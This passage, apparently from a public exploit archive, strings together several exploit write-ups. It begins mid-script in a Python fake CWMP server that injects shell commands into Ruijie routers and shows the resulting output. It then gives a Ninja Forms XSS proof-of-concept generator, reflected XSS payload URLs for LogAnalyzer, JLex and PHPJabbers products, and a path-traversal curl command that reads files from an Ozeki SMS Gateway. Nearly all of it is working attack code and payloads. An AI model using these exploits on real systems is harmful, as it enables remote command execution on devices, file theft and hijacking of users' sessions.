result['parameters'][parameter_name] = parameter_value return result def cwmp_inform_response(): return """<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>""" def command_payload(command): current_time = time.time() result = """<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command) return result def command_response(soap): cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1) response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1) result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} return result class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): protocol_version = 'HTTP/1.1' def do_GET(self): self.send_response(204) self.end_headers() def do_POST(self): print("[*] Got hit by", self.client_address) f = io.BytesIO() if 'service' in self.path: stage, info = self.parse_stage() if stage == "cwmp_inform": self.send_response(200) print("[!] Got Device information", self.client_address) print("[*] Product Class:", info['product_class']) print("[*] Serial Number:", info['serial_number']) print("[*] MAC Address:", info['parameters']['mac']) print("[*] STUN Client IP:", info['parameters']['stunclientip']) payload = bytes(cwmp_inform_response(), 'utf-8') f.write(payload) self.send_header("Content-Length", str(f.tell())) elif stage == "command_request": self.send_response(200) self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") print("[*] Device interacting", self.client_address) print(info) payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') f.write(payload) self.send_header("Content-Length", str(f.tell())) else: print("[*] Command response", self.client_address) print(unescape(info['response'])) self.send_response(204) f.write(b"") else: print("[x] Received invalid request", self.client_address) self.send_response(204) f.write(b"") f.seek(0) self.send_header("Connection", "keep-alive") self.send_header("Content-type", "text/xml;charset=utf-8") self.end_headers() if f: self.copyfile(f, self.wfile) f.close() def parse_stage(self): content_length = int(self.headers['Content-Length']) post_data = gzip.decompress(self.rfile.read(content_length)) if "cwmp:Inform" in post_data.decode("utf-8"): return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): return ("command_response", command_response(post_data.decode("utf-8"))) else: return ("command_request", "Ping!") def log_message(self, format, *args): return if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', help='Specify alternate bind address ' '[default: all interfaces]') parser.add_argument('port', action='store', default=PORT, type=int, nargs='?', help='Specify alternate port [default: {}]'.format(PORT)) args = parser.parse_args() Handler = CustomHTTPRequestHandler with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: ip_addr = args.bind if args.bind != '' else '0.0.0.0' print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() """ Output ====== ubuntu:~$ python3 exploit.py [!] serving fake CWMP server at 0.0.0.0:8080 [*] Got hit by ('[redacted]', [redacted]) [!] Got Device information ('[redacted]', [redacted]) [*] Product Class: EW1200G-PRO [*] Serial Number: [redacted] [*] MAC Address: [redacted] [*] STUN Client IP: [redacted]:[redacted] [*] Got hit by ('[redacted]', [redacted]) [*] Device interacting ('[redacted]', [redacted]) Ping! [*] Got hit by ('[redacted]', [redacted]) [*] Command response ('[redacted]', [redacted]) PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms 64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms --- 127.0.0.1 ping statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.300/0.335/0.400 ms Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux """

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) # Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt # Date: 2023-07-27 # Exploit Author: Mehran Seifalinia # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip # Version: 3.6.25 # Tested on: Windows 10 # CVE: CVE-2023-37979 from requests import get from sys import argv from os import getcwd import webbrowser from time import sleep # Values: url = argv[-1] if url[-1] == "/": url = url.rstrip("/") # Constants CVE_NAME = "CVE-2023-37979" VULNERABLE_VERSION = "3.6.25" # HTML template HTML_TEMPLATE = f"""<!DOCTYPE html> <!-- Created By Mehran Seifalinia --> <html> <head> <title>{CVE_NAME}</title> <style> body {{ font-family: Arial, sans-serif; background-color: #f7f7f7; color: #333; margin: 0; padding: 0; }} header {{ background-color: #4CAF50; padding: 10px; text-align: center; color: white; font-size: 24px; }} .cool-button {{ background-color: #007bff; color: white; padding: 10px 20px; border: none; cursor: pointer; font-size: 16px; border-radius: 4px; }} .cool-button:hover {{ background-color: #0056b3; }} </style> </head> <body> <header> Ninja-forms reflected XSS ({CVE_NAME})</br> Created by Mehran Seifalinia </header> <div style="padding: 20px;"> <form action="{url}/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf&#95;batch&#95;process" /> <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" /> <input type="hidden" name="security" value="e29f2d8dca" /> <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" /> <input type="hidden" name="method&#95;override" value="&#95;respond" /> <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" /> <input type="submit" class="cool-button" value="Click here to Execute XSS" /> </form> </div> <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div> <footer> <a href="https://github.com/Mehran-Seifalinia">Github</a> </br> <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a </footer> </body> </html> """ def exploit(): with open(f"{CVE_NAME}.html", "w") as poc: poc.write(HTML_TEMPLATE) print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html") print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^") sleep(2) webbrowser.open(f"{getcwd()}\{CVE_NAME}.html") # Check if the vulnerable version is installed def check_CVE(): try: response = get(url + "/wp-content/plugins/ninja-forms/readme.txt") if response.status_code != 200 or not("Ninja Forms" in response.text): print("[!] Ninja-forms plugin has not installed on this site.") return False else: version = response.text.split("Stable tag:")[1].split("License")[0].split()[0] main_version = int(version.split(".")[0]) partial_version = int(version.split(".")[1]) final_version = int(version.split(".")[2]) if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25): print(f"[*] Vulnerable Nonja-forms version {version} detected!") return True else: print(f"[!] Nonja-forms version {version} is not vulnerable!") return False except Exception as error: print(f"[!] Error: {error}") exit() # Check syntax of the script def check_script(): usage = f""" Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET] OPTIONS: --exploit: Open a browser and execute the vulnerability. TARGET: An URL starts with 'http://' or 'https://' Examples: > {argv[0].split("/")[-1]} https://vulnsite.com > {argv[0].split("/")[-1]} --exploit https://vulnsite.com """ try: if len(argv) < 2 or len(argv) > 3: print("[!] Syntax error...") print(usage) exit() elif not url.startswith(tuple(["http://", "https://"])): print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'") exit() else: for arg in argv: if arg == argv[0]: print("[*]Starting the script >>>") state = check_CVE() if state == False: exit() elif arg.lower() == "--exploit": exploit() elif arg == url: continue else: print(f"[!] What the heck is '{arg}' in the command?") except Exception as error: print(f"[!] Error: {error}") exit() if __name__ == "__main__": check_script()

# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting # Date: 2023.Aug.01 # Exploit Author: Pedro (ISSDU TW) # Vendor Homepage: https://loganalyzer.adiscon.com/ # Software Link: https://loganalyzer.adiscon.com/download/ # Version: v4.1.13 and before # Tested on: Linux # CVE : CVE-2023-36306 There are several installation method. If you installed without database(File-Based),No need to login. If you installed with database, You should login with Read Only User(at least) XSS Payloads are as below: XSS http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123 http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

# Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS # Exploit Author: CraCkEr # Date: 01/08/2023 # Vendor: JLexArt # Vendor Homepage: https://jlexart.com/ # Software Link: https://extensions.joomla.org/extension/jlex-review/ # Demo: https://jlexreview.jlexart.com/ # Version: 6.0.1 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: / URL parameter is vulnerable to XSS https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1 XSS Payloads: itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) # Date: 01.08.2023 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://ozeki-sms-gateway.com # Software Link: https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip # Version: 10.3.208 # Tested on: Windows 10 ##################################### Arbitrary File Read PoC ##################################### curl https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini ##################################### Arbitrary File Read PoC #####################################

# Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS # Exploit Author: CraCkEr # Date: 01/08/2023 # Vendor: JLexArt # Vendor Homepage: https://jlexart.com/ # Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/ # Demo: https://jlexguestbook.jlexart.com/ # Version: 1.6.4 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /u/perry-705 GET parameter 'q' is vulnerable to XSS http://website/u/perry-705?q=[XSS]&wl=1 XSS Payloads: db8ck"onfocus="confirm(1)"autofocus="xwu0k

# Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 20/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/shuttle-booking-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4112 ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php URL parameter is vulnerable to RXSS https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1

# Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/service-booking-script/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4113 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]

# Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/cleaning-business-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4115 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS] [-] Done

# Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/night-club-booking-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4114 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=

# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4117 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date= [-] Done